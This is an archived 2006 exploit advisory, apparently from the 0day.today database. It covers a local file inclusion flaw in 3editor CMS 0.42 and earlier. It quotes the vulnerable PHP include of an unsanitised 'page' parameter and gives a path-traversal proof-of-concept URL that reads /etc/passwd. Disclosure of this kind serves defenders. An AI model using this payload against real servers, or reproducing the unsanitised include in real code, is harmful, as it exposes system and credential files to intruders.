3editor CMS <= 0.42 (index.php) Local File Include Vulnerability

2006-12-22T00:00:00
ID 1337DAY-ID-1290
Type zdt
Reporter 3l3ctric-Cracker
Modified 2006-12-22T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ================================================================
3editor CMS <= 0.42 (index.php) Local File Include Vulnerability
================================================================



************************************************************************     
*script Name: 3editor CMS (index.php) Local File Include Exploit       *
*Download:http://www.matteolucarelli.net/3editor/index.htm             *
*[Author      : Dr Max Virus                                           *
************************************************************************
*Bug & Problem                                                         *
*In file index.php Let's Take a look;                                  *
*if (!isset($_GET['page'])) include('phplib/treeedit.php');            *
*else include('phplib/'.$_GET['page']);                                *
************************************************************************
*As We can see the variable of page is not sanitized So attacker can   *
*apply his bug when:                                                   *
*register_globals=on                                                   *
************************************************************************
*POC Example:                                                          *
*http://[target]/[path]/index.php?page=../../../../../etc/passwd       *
************************************************************************
*Thx: -koray -ajann -Timq -r0ut3r -All my Friends                      *
*special gr33ts:AsianEagle -The master -Kacper -Hotturk                *
************************************************************************



#  0day.today [2018-02-18]  #